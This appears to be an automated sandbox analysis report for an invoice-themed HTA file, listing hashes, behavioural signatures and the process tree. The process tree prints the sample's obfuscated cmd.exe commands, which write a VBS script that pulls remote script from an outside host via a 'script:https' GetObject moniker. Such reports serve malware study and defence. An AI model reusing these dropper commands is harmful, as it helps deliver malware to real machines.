Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-es -
resource tags
arch:x64arch:x86image:win10v2004-20240508-eslocale:es-esos:windows10-2004-x64systemwindows -
submitted
13/05/2024, 16:39
Static task
static1
Behavioral task
behavioral1
Sample
Su-Factura-2709784.hta
Resource
win10v2004-20240508-es
General
-
Target
Su-Factura-2709784.hta
-
Size
1KB
-
MD5
3f5c71b21594d8da434f6ab9b31b021a
-
SHA1
f2b5e5d5d244f08d3f3d28abb01ec395b212f7db
-
SHA256
183004136f92ee51ca608419dafb6c7df9004cf1ef6898143e85eb3eb93b9e11
-
SHA512
0e80b6be18dfcae58fa109f433f8c1d9fe6110fce3bbf11cff576f100b4486c9bebe750cd6ce8ef942546eafe04f165f63ac922e2138b34fa700cec1f3677670
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1632 wrote to memory of 3052 1632 mshta.exe 83 PID 1632 wrote to memory of 3052 1632 mshta.exe 83 PID 1632 wrote to memory of 3052 1632 mshta.exe 83 PID 1632 wrote to memory of 2056 1632 mshta.exe 86 PID 1632 wrote to memory of 2056 1632 mshta.exe 86 PID 1632 wrote to memory of 2056 1632 mshta.exe 86 PID 2056 wrote to memory of 3404 2056 cmd.exe 88 PID 2056 wrote to memory of 3404 2056 cmd.exe 88 PID 2056 wrote to memory of 3404 2056 cmd.exe 88 PID 2056 wrote to memory of 2900 2056 cmd.exe 89 PID 2056 wrote to memory of 2900 2056 cmd.exe 89 PID 2056 wrote to memory of 2900 2056 cmd.exe 89 PID 2056 wrote to memory of 2008 2056 cmd.exe 90 PID 2056 wrote to memory of 2008 2056 cmd.exe 90 PID 2056 wrote to memory of 2008 2056 cmd.exe 90 PID 2056 wrote to memory of 1184 2056 cmd.exe 91 PID 2056 wrote to memory of 1184 2056 cmd.exe 91 PID 2056 wrote to memory of 1184 2056 cmd.exe 91
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Su-Factura-2709784.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /V/D/c "echo m3t94="ri">C:\Users\Public\MLlgEf63.vbs&&echo KSYptbP50="tp">>C:\Users\Public\MLlgEf63.vbs&&echo qYrg7=".":mYMMRW23="sC" ^& m3t94 ^& "pt:ht" ^& KSYptbP50 ^& "s://">>C:\Users\Public\MLlgEf63.vbs"2⤵PID:3052
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /V/D/c echo|set /p=^"mYMMRW23^=mYMMRW23 ^& ^"162"+qYrg7+"200"+qYrg7+"178"+qYrg7+"68"+qYrg7+"host"+qYrg7+"secureserver"+qYrg7+"net/g1^":GetO^">>C:\Users\Public\\MLlgEf63.vbs&echo|set /p=^"bject(^">>C:\Users\Public\\MLlgEf63.vbs2⤵
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo"3⤵PID:3404
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /p="mYMMRW23=mYMMRW23 & "162"+qYrg7+"200"+qYrg7+"178"+qYrg7+"68"+qYrg7+"host"+qYrg7+"secureserver"+qYrg7+"net/g1":GetO" 1>>C:\Users\Public\\MLlgEf63.vbs"3⤵PID:2900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo"3⤵PID:2008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /p="bject(" 1>>C:\Users\Public\\MLlgEf63.vbs"3⤵PID:1184
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
92B
MD50248b5d19fce30abf010124180bfb4b8
SHA10207511208ea7a47ad5b170bd339ae8281c0cc99
SHA256a0cb0e1bf16b345141819a497b10c27e56245db5813a463a3b550720a278407b
SHA5122d0d6bda85985b77f9d5313ee304d37fef4c7af4616bb44387ba52fcc8529d684330c0ff1f12e4c07cb6dfb9d5918cf2424ba3124260c56dfcc84c144e4b5e37
-
Filesize
212B
MD519296be7fff334ba43a793095e3671a9
SHA10b86a0683db59a5df1b35631a1403a2a601d64f8
SHA256768f66e53b0732b6eb2e0c7597f30c741a79f16c0af571f1e48f1bd364627440
SHA512013e7158949be0c491a594238dfac43db28e6f4b316ad71e5cfb6a3172eda4ffabf3101871c41d1801ffc7cae98c33521a16553988285995d3b6ed37f69dfa2c